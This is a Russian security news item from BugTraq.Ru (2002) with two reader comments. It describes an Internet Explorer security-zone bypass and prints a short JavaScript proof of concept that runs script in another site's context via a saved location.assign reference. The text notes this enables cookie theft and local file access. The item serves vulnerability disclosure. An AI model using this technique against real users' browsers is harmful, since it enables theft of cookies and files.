BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2002/10/6.html

Обход зон безопасности в IE
dl // 03.10.02 02:32
Сохранение ссылки на NewWindow.location.assign, где NewWindow - окно, созданное скриптом, позволяет выполнить произвольный скрипт в любой зоне безопасности:

function f(){}
w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0");
f=w.location.assign;
w.location.href="http://www.yahoo.com";
alert("wait for the page");
f("javascript:alert(document.body.innerHTML)");

Первой строчкой открываем окно с локальным файлом (возможно, и несуществующим), сохраняем ссылку н аэто окно, далее, открыв в нем страницу из другой зоны, вызываем код в ее контексте.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2002/10/6.html]

Помимо кражи кук пользователя с произвольных сайтов, это дает возможность получить доступ к локальным файлам - см. пример 2.

Источник: пример 1, пример 2    
теги: yahoo  |  предложить новость  |  обсудить  |  все отзывы (2) [4620]
назад «  » вперед

аналогичные материалы
Shellshock успешно использовали в атаке на Yahoo // 06.10.14 23:38
Twitter подтвердил "взлом" // 01.05.09 11:48
ICQ: пора валить? // 22.01.09 16:27
Microsoft пообещала блокировать уязвимые ActiveX по запросу производителей // 10.04.08 01:29
Апрельские обновления от MS // 09.04.08 01:56
Microsoft покупает Yahoo за $44,6 млрд // 01.02.08 16:05
Не стоит слишком доверять тулбарам FireFox // 31.05.07 18:02
 
последние новости
Блокировка российских аккаунтов на GitHub // 15.04.22 11:13
Отзыв сертификатов ЦБ РФ, ПСБ, ВТБ // 01.03.22 14:12
Памятка мирным людям во время информационной войны // 24.02.22 22:24
Google окончательно прикрывает бесплатный G Suite // 28.01.22 16:48
С наступающим // 31.12.21 23:59
Серьезная уязвимость в Apache Log4j // 11.12.21 12:13
Крупный взлом GoDaddy // 23.11.21 20:52

Комментарии:

Обход зон безопасности в IE 05.10.02 02:26  
Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member
<"чистая" ссылка>
Помимо кражи кук пользователя с произвольных сайтов, это
> дает возможность получить доступ к локальным файлам - см.
> пример 2.
У меня AVP второй пример зарубил :)
Обход зон безопасности в IE 07.10.02 22:57  
Автор: Digital_Scream Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :)
<добавить комментарий>



  Copyright © 2001-2022 Dmitry Leonov Design: Vadim Derkach